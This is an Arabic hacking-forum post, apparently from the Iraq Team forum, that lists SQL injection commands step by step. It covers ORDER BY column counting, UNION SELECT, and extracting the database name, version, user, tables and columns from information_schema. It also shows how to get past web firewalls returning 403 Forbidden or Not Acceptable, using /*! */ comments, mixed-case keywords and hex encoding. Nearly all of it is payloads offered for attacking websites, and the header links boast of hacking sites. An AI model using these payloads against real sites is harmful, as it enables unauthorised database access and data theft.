1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع
  4. 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول
    الكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه
    لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده قرائة الموضوع

[ شرح ] حصريا على شبكة عراق تيم جميع أوامر SqL Injection أوامر تخطي Forbidden 403 أوامر تخطي Not Acc

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏22 نوفمبر 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 1,400 الردود : 0 ‏22 نوفمبر 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:


    السلام عليكم ورحمة الله وبركاته

    هذه اول مشاركاتي في المنتدى واتمنى الموضوع ينال رضاكم

    اليوم معنا :

    جميع أوامر


    SqL Injection

    أوامر تخطي


    Forbidden 403


    أوامر تخطي


    Not Acceptable


    أوامر التـشفــيــر أثناء الحقن


    أوامر تخطي عدم ظهور عدد الأعمدة


    ==============================
    أوامر SqL Injection
    ==============================
    أمر استخراج عدد الأعمدة
    ==============================
    +order+by+
    ==============================
    أمر استخراج العامود المصاب
    ==============================
    +union+select+
    ==============================
    أمر استخراج اسم قاعدة البيانات
    ==============================
    Database()
    ==============================
    أمر استخراج اصدار قاعدة البيانات
    ==============================
    Version()
    ==============================
    أمر استخراج يوزر قاعدة البيانات
    User()
    ==============================
    أمر استخراج الجداول
    ==============================
    يوضع هذا الأمر مكان العامود المصاب
    ==============================
    group_concat(table_name)
    ==============================
    ويوضع هذا الأمر في نهاية الرابط
    ==============================
    +from+information_schema.tables+where+table_schema =database()--
    ==============================
    أمر استخراج الأعمدة
    ==============================
    يوضع هذا الأمر مكان العامود المصاب
    ==============================
    group_concat(column_name)
    ==============================
    ويوضع هذا الأمر في نهاية الرابط
    ==============================
    +from+information_schema.columns+where+table_schem a=database()--
    ==============================
    أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
    ==============================
    تخطي Forbidden 403 اثناء استخراج العامود المصاب
    ==============================
    اضافة الفلتر
    ==============================
    /*! */
    ==============================
    على كلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!select*/
    ==============================
    واذا لم تنجح الطريقة العب بكلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    احرف سمول وأحرف كابتل
    ==============================
    تخطي Forbidden 403 اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(table_name)
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!GrOuP_CoNcAT(table_name)*/
    ==============================
    وتعديل الامر
    ==============================
    ليصبح بهذا الشكل
    ==============================
    +from+information_schema.tables+where+table_schema =database()--
    ==============================
    تخطي Forbidden 403 اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(column_name)
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!GrOuP_CoNcAT(column_name)*/
    ==============================
    وتعديل الامر
    ==============================
    ليصبح بهذا الشكل
    ==============================
    +from+information_schema.columns+where+table_schem a=database()--
    ==============================
    ليصبح بهذا الشكل
    ==============================
    +
    ==============================
    from+information_schema./*!columns*/+where+table_schema=database()--
    ==============================
    أوامر تخطي Not Acceptable
    ==============================
    تخطي Not Acceptable اثناء استخراج العامود المصاب
    ==============================
    اضافة الفلتر
    ==============================
    /*! */
    ==============================
    على كلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!select*/
    ==============================
    واذا لم تنجح الطريقة العب بكلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    احرف سمول وأحرف كابتل
    ==============================
    تخطي
    Not Acceptable
    اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(table_name)
    ==============================
    ليصبح بالشكل دا
    ==============================
    /*!GrOuP_CoNcAT(table_name)*/
    ==============================
    تخطي Not Acceptable اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(column_name)
    ==============================
    ليصبح بالشكل دا
    ==============================
    /*!GrOuP_CoNcAT(column_name)*/
    ==============================
    أوامر تخطي الحماية من بعض الأوامر
    ==============================
    هذا الأمر نضعه مكان العامود المصاب
    ==============================
    concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
    ==============================
    وهذا الأمر نضعه في نهاية الرابط
    ==============================
    +from+information_schema.columns--
    ==============================
    أوامر تخطي عدم ظهور عدد الأعمدة
    ==============================
    نقوم باضافة
    ==============================
    +--+
    ==============================
    في نهاية الرابط
    ==============================
    واضافة
    العلامة التي بين قوسين
    ==============================
    (')
    ==============================
    بعد
    ==============================
    .php?id=1
    ==============================
    ليصبح بهذا الشكل
    ==============================
    .php?id=1'
    ==============================
    هذه تكون نهاية الموضوع ارجو ان اكون قد وفقت بوضع الأوامر

    :{10}:​
    pwvdh ugn af;m uvhr jdl [ldu H,hlv SqL Injection jo'd Forbidden 403 Not Acceptable​
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...